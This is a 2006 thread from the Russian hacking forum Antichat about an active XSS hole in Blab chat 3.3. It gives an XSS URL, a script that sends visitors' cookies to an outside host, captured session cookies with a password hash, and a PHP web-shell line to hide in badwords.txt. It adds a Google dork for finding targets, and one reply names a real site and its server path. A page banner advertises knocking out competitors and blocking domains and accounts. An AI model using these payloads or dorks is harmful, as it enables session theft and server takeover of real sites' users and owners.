Форум АНТИЧАТ - Blab chat Active XSS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Blab chat Active XSS

Опции темы

Поиск в этой теме

Опции просмотра

Blab chat Active XSS

31.10.2006, 11:53

TANZWUT

Крёстный отец :)

Регистрация: 22.06.2005

Сообщений: 1,330

Провел на форуме:
5302668

Репутация: 2054

Отправить сообщение для TANZWUT с помощью ICQ

Blab chat Active XSS

решил поковыряца, под руками была только версия 3,3, думаю слипу интересно будет
http://localhost/chat/info.php?reason=<script%20src=http://localhost/s.js></script>

s.js

PHP код:


		
			
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

PHP код:


		
			
REFERER=http://localhost/chat/info.php?reason=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%2F%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E

    QUERY=blab_id=1-bb2e48de1ba9a89497564acb9b584cc4; blab_pass=813dfe9bd7b89fbcc5fd29d2be091bac; blab_lang=9; blab_time=3

    AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)

+ с правами админа можно сдампить БД юзеров,
при наличии локального инклуда на сайте
в badwords.txt можно безпалевно вписать

PHP код:


		
			
<?php system($_GET[cmd]); ?>

- админ этого неувидит, а так же с обычными правами можно загрузить картинку с шелл кодом.
гугл inurl:"info.php?reason=link"

__________________
Лучший способ защиты - это нападение!!!

31.10.2006, 12:14

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Отлично поработал

Если есть чат на примете, в онлайне, кинь ссылку. А то через денвер в лом искать. Буду пробовать ещё что то сделать

__________________
..

Определение версии чата

31.10.2006, 12:18

TANZWUT

Крёстный отец :)

Регистрация: 22.06.2005

Сообщений: 1,330

Провел на форуме:
5302668

Репутация: 2054

Определение версии чата

в самом низу
гугл inurl:"info.php?reason=link"

Определение версии чата - _http://www.host.ru/chat/version

__________________
Лучший способ защиты - это нападение!!!

Последний раз редактировалось TANZWUT; 31.10.2006 в 12:23..

31.10.2006, 13:06

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Вот вам и такое=)
http://www.sisak.info/index.php?p=

__________________
..

31.10.2006, 13:14

TANZWUT

Крёстный отец :)

Регистрация: 22.06.2005

Сообщений: 1,330

Провел на форуме:
5302668

Репутация: 2054

фильтруются символы ".." и "/"
путь /home/sisak/public_html/

__________________
Лучший способ защиты - это нападение!!!

Последний раз редактировалось TANZWUT; 31.10.2006 в 13:18..

20.04.2007, 14:52

Антошка2003

Постоянный

Регистрация: 03.04.2005

Сообщений: 610

Провел на форуме:
3238231

Репутация: 165

пригодилось

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25
Нужна консультация (Intranet Chat)	ty3ik	Чаты	3	30.04.2006 19:15
Active XSS in Invision Power Board 2.1.4	k00p3r	Уязвимости	8	03.03.2006 20:51

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход